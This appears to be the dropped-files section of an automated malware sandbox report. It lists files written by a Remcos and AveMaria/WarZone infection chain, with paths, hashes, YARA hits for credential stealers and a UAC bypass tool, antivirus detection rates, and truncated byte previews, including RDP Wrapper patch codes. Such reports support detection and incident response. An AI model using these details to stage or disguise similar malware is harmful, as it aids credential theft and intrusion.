                                                                                              SHA-512:0159E4C43D1780F64E7EF748F4E5C670BF7773D7E26B0DE35B9F4841421362CFF68192C54F4077F14C7E4BCD6AC416EF1A2855A761C8E974691ACA9F0B786790
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2021-01-16..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM
                                                                                              C:\Program Files\Microsoft DN1\sqlmap.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):116736
                                                                                              Entropy (8bit):5.884975745255681
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                                              MD5:461ADE40B800AE80A40985594E1AC236
                                                                                              SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                                              SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                                              SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 25%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 46%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Microsoft Vision\07-12-2021_13.38.52
                                                                                              Process:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):110
                                                                                              Entropy (8bit):3.1311446292929235
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:blXlulovDluLAnyWdl+SliplWyWdl+SliplWyWdl+Slin:zuWpyWn+SkhWn+SkhWn+Skn
                                                                                              MD5:663942D41C4A0AFFA2367DE4CD855CDB
                                                                                              SHA1:D5D1149BAA07EA2FFD482979564E1C964C9DE03E
                                                                                              SHA-256:24CF2962CA5F0E9A4948227A0E0A9B6427382527B26FEA54BF9FAD3DC154F6B8
                                                                                              SHA-512:2E2822A50C4802726C20CC20E1AFEBA212CD1AAD4167259E23428E72F45205F61DA10FACE872CE00BA11D7D34CBC4C23FB1A2FCACCB9DE3B42A2913D704B7F2A
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ..{.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.}...L.e.f.t. .W.i.n.d.o.w.s.L.e.f.t. .W.i.n.d.o.w.s.L.e.f.t. .W.i.n.d.o.w.s.
                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\5.exe.log
                                                                                              Process:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):916
                                                                                              Entropy (8bit):5.282390836641403
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLF20NaL3z2p29hJ5g522rW2xAi3AP26K95rKoO2+g2+:MwLLD2Y9h3go2rxxAcAO6ox+g2+
                                                                                              MD5:5AD8E7ABEADADAC4CE06FF693476581A
                                                                                              SHA1:81E42A97BBE3D7DE8B1E8B54C2B03C48594D761E
                                                                                              SHA-256:BAA1A28262BA27D51C3A1FA7FB0811AD1128297ABB2EDCCC785DC52667D2A6FD
                                                                                              SHA-512:7793E78E84AD36CE65B5B1C015364E340FB9110FAF199BC0234108CE9BCB1AEDACBD25C6A012AC99740E08BEA5E5C373A88E553E47016304D8AE6AEEAB58EBFF
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\de460308a9099237864d2ec2328fc958\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):2351104
                                                                                              Entropy (8bit):7.506766900421548
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:AW3dW0e3O2oWFaLcZig+bnDPXqWtex9vtVl:AW3dWJloWFaLcZig+j2WcxLVl
                                                                                              MD5:32EB10C12A29B38F13730CD1F5DCAD4D
                                                                                              SHA1:4D0EB488A01FED1720483DFA270423BEA593CA14
                                                                                              SHA-256:06550442678FB92B0273B83F349D47D3654FB72A7D98398CE3B63E3635B8E8F1
                                                                                              SHA-512:1E95F1A74B7F2DCDE31B661AAD078373DD757B689EE02E35E36090777A1B92CF7564271FC577DF529C6E7C77B3D294CCE0FD913243A7DF6DC6ACC2F58C2FB6C5
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i...d...i.Rich..i.................PE..L...>..V......................#.....L........ ....@...........................#.....[...........................................(....0....#................................................................. ... ....... ............................text...$........................... ..`.data...,.... ......................@....rsrc.....#..0....#.. ..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):22288
                                                                                              Entropy (8bit):5.344169070723195
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:ptCDSmWYc1mJVovSKrnVrf1JNc7nudlu5cOOhhrm1dOty3aC:sWWB6ntXSbudl8cOgrqqa
                                                                                              MD5:2ED533489ED94BD3334F607D0E4D17D9
                                                                                              SHA1:0B5874B7F26C3800EEEE97B8B7FEF2FE287D4F3C
                                                                                              SHA-256:25F723622BDBA89C1D9E30FA05CA7A5613DA6EDBF3D2F23FDE75D3851929099A
                                                                                              SHA-512:6F908BA0AAD19FB53DA1144D2952F28A80776133083DD13049FFB49BD366686681893009D516F07744E08AFA2ED475E0244B9E4C1A555A7BF9963A30F1B3EB55
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: @...e...........|.......h.:.-.%.".......U.I..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                              C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):900994
                                                                                              Entropy (8bit):7.560706052049211
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:cDpCT3m/baIGgI+ZdBE07uAAL3UfN5qsP6dudK5Yk7Er2nNuviB4CFG:E4H2xZdW0CAU3CNr3dKGr2ozCFG
                                                                                              MD5:6C9447A6F1B04C75D95594338AE61E06
                                                                                              SHA1:F2EBF6D355F30512AB1E92CAB9525A94F99BFEC5
                                                                                              SHA-256:810781308E53BE9C2ACA613FB67EF7E577896DE69A2C2DEFF387A0763EAA2AE6
                                                                                              SHA-512:ABD10D8DBB5097C5C09B8C498AEDE589A6B0EE20EAB03C615F84ADFDA61E87D63FACBA9CB53E117AE1E84B73DD4DE9A49236EDC5B17330FC73779A4124033616
                                                                                              Malicious:true
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@.......................... ...............................................t.......p..H............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc...H....p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):586861
                                                                                              Entropy (8bit):7.360391735779929
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:Khzfld/fqWhWxlXWx/0tTJwbxlKzMbDtz6yrkvtVm:SPXqWtGtTOl0zM/6vtVm
                                                                                              MD5:78EDE0254C66FA9E667E4CEB88754E1C
                                                                                              SHA1:385599DCC3260AC9BB782DA9AB0C69A7BB541645
                                                                                              SHA-256:A542D2953BB5F7516342E100BB01447371CDF7BAF2FD300D61B52D4D2E323DC1
                                                                                              SHA-512:39B30A1AEA89DB0E30A208157B4E606463CAEC72E66D231EDBEC22044E8C66E09674C66D36E2AF363352735D0387C050BC73AEBA47D254ACFE0AB2D9C7965203
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................................................................t.......p...[...........................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc....[...p...\...x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):852277
                                                                                              Entropy (8bit):7.535786145318411
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                              MD5:3F332B62EEE0970F3189C689D5BD042A
                                                                                              SHA1:F68F7DCC8FFCDD3F93333E711779E8D02DB2DFAE
                                                                                              SHA-256:7C7983ADA08828EA0C0ED5B17B05F8DAD5BF6FA44E1A4692C37F18C340E14219
                                                                                              SHA-512:2399BF335B60B87D1126B7CD663DFD937BE0DA7FEF815225D53940E5D01CF4B02969DC33D75E7B1F5F63B3233ED1EA179CC517C1C4639802293E4EA8CF25D5EF
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................@...............................................t.......p...............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc........p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\84a79tbwxmvn7adt
                                                                                              Process:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):604159
                                                                                              Entropy (8bit):7.96721366302899
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:uL2jvzmCP0rI7B+0G36tX8j6FTkYcwpWFt7tVYkfv:uCjrml0hGqtXiuT5WX7zYk3
                                                                                              MD5:71353B7F9141FA3C5760ACE513F8C385
                                                                                              SHA1:A6DD26880269F3FAEADA77C5F74ADE2433AF78C3
                                                                                              SHA-256:FC517290096122DB50FF785F3E3FCE641EF2164EA93351A8655A43732344BF7C
                                                                                              SHA-512:CDD0A4C4278D24019837811E429312D572BEC638812B5C35EA52CAFB443719974E7C614216A499D1008F843F021E06F1F3B6AD6E66082E616EC14D876C8108C0
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: *...,.).F.C..L.q.='.Z[=.f.w4;..H..8V...s.......Ly./J...0(....0Q.jK.x.,.....J.........J6............Z..v%.bSZCc....?G......:..R.2q..z=.9...N\k....9...}C.....`}...Z.y..d...:Z..s....x.m..^/.-M...F..y...a.xj.].m...l.)U...u....){.#.h!...g..T.a.@Fn.e,.)..C;....k..Z[=cf.w.;..G8V&..s,........./J...!(.d."0R..P..D.Ft.).".S.v)WG...,p:yt...I..7tx./~....{.4....G..........e..iH.0.<L-.%...I.(N}.wD;QQ.x8.j$..(fKw.D...T.#.}V...dm..RF.G..)./#...lS..|..5...#........H...Xjs......._....g..T.a.....$,.)...C04L.d.='.\[=cf.w4;..H..8...I....7....../J#..(.d..0RF.P.bD.t.)."...d.....Myt.v..zI....8./A..S..{.n.m.8..)....@...e.i...0|.;-..>."z{(N}.wk;Q......j$...Kw..DL&\T/..}V...dm..RF.G...../#...lS..| .5...#......m.Ho..Xjs......._....g..T.a.@Fn.e,.).F.C0zL.d.='.Z[=cf.w4;..H..8V...s.......Ly./J...0(.d..0RF.P.bD.t.).".S.v.WG...,:Myt.....I..7t8./A..S..{.n.m...G..........e..i...0|<L-..>."z{(N}.wD;QQ.x8.j$..(fKw.DL..T/#.}V...dm..RF.G..)./#...lS..| .5...#......m.Ho..X
                                                                                              C:\Users\user\AppData\Local\Temp\8tps30shve
                                                                                              Process:C:\Users\user\Desktop\xxTzyGLZx5.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):602111
                                                                                              Entropy (8bit):7.978364442659117
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:LX+3nVWt54yfDnFQA6NnOrPyTCtAoPC12g+srrZ4pTPLYQ4rq4:LX+3VWt5hSApOCt2+suPLYQ4P
                                                                                              MD5:A237795B8A0EAE5B9D60471CEE202780
                                                                                              SHA1:38FBA9CC6CAA3BA28008A7B54D92B285EC3F7301
                                                                                              SHA-256:D00E1D2E29582CF8734B4B392C8B0015D40714B7EA1C4724CEDCC1E3D53473D5
                                                                                              SHA-512:338C9BA4F7785297DE2F33037117FD5CE138E7772BE1F2A20A21C14458F252494101A19C0D6E95FE01542F6C6D8ABDBE9C140F15193FD652EB0D89DBDFDDCBB0
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ......%...$Bo..Z..]......Qu...R.H....@*..q'..|...H.m,.e..D..a]0..3.....:v.{.........0..;5..zR.P~.e.9..0xx..uz..o...;../9M..9:]^.e.....XXV.5~.....]...c..D..=Tp...PQ..Q....j.......dk.*K0..."......0..T d#......&.\..v.s.V...t.~...r^g...I...[..D.....%....lxo..Z...'].R.....u...R.Q....@*..q'.5|...H.m..e.fDK>.k0..T}hs!.e.....@..o...A..a|..3...6<.....^ h...~G..9iz..;..D`.<.~..&h....O.z....=.2.t..1..c..D..={]%..PQ.|...U.h.M..E.?.dk.*K...t]H...E.. nL.9#..8..&.\..S.s.V\....~@...r^gE...F..p...H...C.%.He..Uo..Z..].R...UQu.M...Q....@*..q'ob..g.........DK>.k0..T}hs!.e.....@..o...A..a|..3...6<.....^ h...~G..9iz..;..$n.<.~..&q...O.z....=.2.t..1..c..D..=Tp...PQ.7...U.h.M..E..dk.*K...t]H...E.0..5 d#..e.&.\..S.s.V\....~@...r^g...I...[..DN`...%.....xo..Z..].R....Qu...R.H....@*..q'..|...H.m,.e..DK>.k0..T}hs!.e.....@..o...A..a|..3...6<.....^ h...~G..9iz..;..$n.<.~..&q...O.z....=.2.t..1..c..D..=Tp...PQ.7...U.h.M..E..dk.*K...t]H...E.0..5 d#..e.&.\..S.s.V\.
                                                                                              C:\Users\user\AppData\Local\Temp\KGa06088
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:Zip archive data, at least v2.0 to extract
                                                                                              Category:dropped
                                                                                              Size (bytes):6868
                                                                                              Entropy (8bit):7.811153415048189
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:U6Cw3XxQfMpKAxQfMpKiCdzUpPRCdzUpPwiJX5VjUuQ3+RTaXI3+RTaX/Bb4o8/6:U6bQKQyCdzUbCdzUdPjjE+ws+wvB6MVz
                                                                                              MD5:9D1FA086471D9B21684DB17E22C6BDF2
                                                                                              SHA1:18ECCA6670697FC37D596E5173BA38EDC0376BDF
                                                                                              SHA-256:9008E8B54DC2B58F75670C2A118DEC964587CA6EA4389F0EF00495C633C63813
                                                                                              SHA-512:ADC903E5B0C970B226BB9D0DA7B9DDE1A2B012781A43A3771ED864570513D4D366B9AE97F96ADD8190223CD2F16DB56D0770E6057D980E38A3CB50C4A8B9BD3F
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: PK.........D>Q.+.j............Files/LSBIHQFDVT.pdf..Ir@!......'..E.......R..-.Nqx....t.j....m..5.?.F..U..*..h..Rbys.j<...&....`..Xl........l.y....)}.......I...9.bn.....Fk....V5.>v..&.9..jW..7>...1`p.E.#..i.}.C.....c....M...yQp...m.lk...* Th...sw9Ch..q.Q...hM9G....+T....P.\...~k.nO=....=.6.....G..36.^.A..Y.y....].ZCM.%.....O.1....Sg..m..kF..r....y^...\....n`.5d.........G.....|n).....8...*..B.............#...V....xF...z6_......[....F}^..e-...).. .......Ch.8/.j.*OcE.=..6...N......C.z.o.....2....%#....].. ....}J.f..3..#..T......0a6.<.$.........}....vMw...c.... .V..^5..w...!.q....cd.....>WqF..z...h./+....PL.n......r.k......K..F.V.;...=j..b_GX+.^..;..;.3N..?PK.........D>QM.Hu............Files/SFPUSAFIOL.pdf..I.E!...-.C.a.cHx......;.k..S..2..*.+'.....6.1..:_.D4G........o......zS...<.....@<W5AI/.;..~...].m.R..Z..O.....".Z.>...Zx\..NJu\.zt.. ....0...*...b.......*~l.U;...-.n..1.S...>....3.%?...u.h.R:~..4.k....;..W.sj..t..O#...M.Tzg..KQ..C[.:......
                                                                                              C:\Users\user\AppData\Local\Temp\SysInfo.txt
                                                                                              Process:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):39
                                                                                              Entropy (8bit):4.17298996283009
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:oNt+kiE2J5xAI6N:oNwkn23fO
                                                                                              MD5:9E92E8C8C14C21B4E23FD6E21DBCF5F2
                                                                                              SHA1:5E42F7A627F3E0FE4D270107658BF3B29AB97D33
                                                                                              SHA-256:5895259ADC1CF2B32B2961697587BBFCFB6E88D4662816980BF4BE654EFDBCFC
                                                                                              SHA-512:29F537CE20708BAD2E8D70F3EBA4040452070A15B3312A543605BDE55DD4EC72E023274D69FABC14D4DEAC3628CB407EE4A15C67776C5C30990200879CE9CC36
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enwkj00w.kq1.psm1
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: 1
                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrn55b2l.mfa.ps1
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: 1
                                                                                              C:\Users\user\AppData\Local\Temp\bhv9034.tmp
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x13ce402f, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                              Category:dropped
                                                                                              Size (bytes):29884416
                                                                                              Entropy (8bit):0.9935866017056032
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:esPwt8HVmyajw7811fXy7R4aUpPX7Cr6f63rsLOZ:bKyajrO
                                                                                              MD5:75B7BD98F1ECA326D60B87C6C8757180
                                                                                              SHA1:B0E619E0F7ED39A86F16F8EF2BFCBADCC02504AA
                                                                                              SHA-256:84D6B18A806039FEA05FB2C48F05339A55F1C818B1331424FE5C72CD94F696EF
                                                                                              SHA-512:59A444986AA0F1C2B86A0F1260D0C6872138B60AEA78FCB8813987A8B15C005753D80094DD5EE353CB945D4F3E962BC8C4137866E94C7DD4E107A4FCE44FC7E3
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ..@/... ........?......_e..*....w......................^.8......$...x...&...y..h.:.........................b...*....w..............................................................................................{............B.................................................................................................................. .......:&...yQ......................................................................................................................................................................................................................................Y.F:&...yq.....................&...yQ.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              Process:C:\Users\user\Desktop\xxTzyGLZx5.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):115712
                                                                                              Entropy (8bit):6.375962866007663
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:h0jP7/L1B5rVmN8sxHv2M28ix8EUaJxWZoB4u0OVE01:K1VmhaH8EFvW+0OVE0
                                                                                              MD5:805FBB84293E86F25B566A5B2C2815D2
                                                                                              SHA1:5712F69EAFCA434E4D6CDFD8081EBFB728708C25
                                                                                              SHA-256:E78FCD503A6B0A663AB4A72B97C010C932840998DA05784BA75F7D6802EA822F
                                                                                              SHA-512:5927584ABABC4C2D533984C607A96590D1640B6939D33E9F994B684F38F1541DFDC1D0778F5DBE586353C46BEBC3A7F0E46A1156F34E5748AB31FF0AF16807A2
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: AveMaria_WarZone, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: unknown
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z]..><..><..><...3.?<..7D..?<...3.<<......?<......=<..;0..?<..7D..:<..7D..!<..><...<...U..N<...Um.?<...U..?<..Rich><..........PE..L.....I_.................0...........\.......@....@..........................@............@..................................w..........p,................... .......u...............................................@..p............................text............0.................. ..`.rdata...I...@...J...4..............@..@.data....P...........~..............@....rsrc...p,..........................@..@.reloc....... ......................@..B.bss.........0......................@..@................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\c1cbn8ydb22
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):679935
                                                                                              Entropy (8bit):7.985731057036001
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:DYUImlFPDAriO+Za0AnZ7sLbGZ9ARLEUfi5qPP6QudMoYjlEr2na:Dh/Fcr3T0uKKDAdECimwdMwr2a
                                                                                              MD5:5022658720DC7BBAF4A2A177292C1AED
                                                                                              SHA1:722AAF02F5198029E2A91A93BD204F62E71BD77C
                                                                                              SHA-256:F62E47CBD04EF2E3488B98BD3C473218D97D2D2B46B6B49C874AAE439961BD5A
                                                                                              SHA-512:72289FDB58AD4EDE39CB3620FFE2E929FD9FC76F17FF46491425BE73E255FD5244CEBD27B579963A8703C7DD2AC9D3A4D63EC6F98F87E83FE0F4F5DBDBED3708
                                                                                              Malicious:false
                                                                                              Reputation:unknown
